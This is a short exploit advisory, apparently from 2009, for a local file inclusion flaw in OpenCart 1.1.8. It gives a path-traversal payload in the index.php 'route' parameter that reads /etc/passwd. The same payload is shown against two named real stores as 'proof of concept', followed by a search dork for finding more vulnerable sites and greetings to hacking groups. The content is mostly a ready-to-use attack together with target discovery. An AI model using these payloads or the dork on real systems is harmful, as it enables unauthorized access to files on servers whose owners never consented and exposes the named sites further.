[o] Opencart 1.1.8 LFI Injection Vulnerability
Title : Opencart LFI Injection Vulnerability
Software : OpenCart opencart_v1.1.8
Vendor : http://www.opencart.com/
Date : 25 April 2009 ( Indonesia )
Author : OoN_Boy
Contact : oon.boy9@gmail.com
Blog : http://oonboy.blogspot.com
[o] Vulnerable file
index.php
[o] Exploit
http://localhost/[path]/index.php?route=[LFI]
http://localhost/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd
[o] Proof Of Concept
http://www.perebook.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd
http://store.thespaberry.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd
[o] Dork
"Powered by opencart"
[0] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny
Dan buat semuanya yg ga bisa di sebut satu²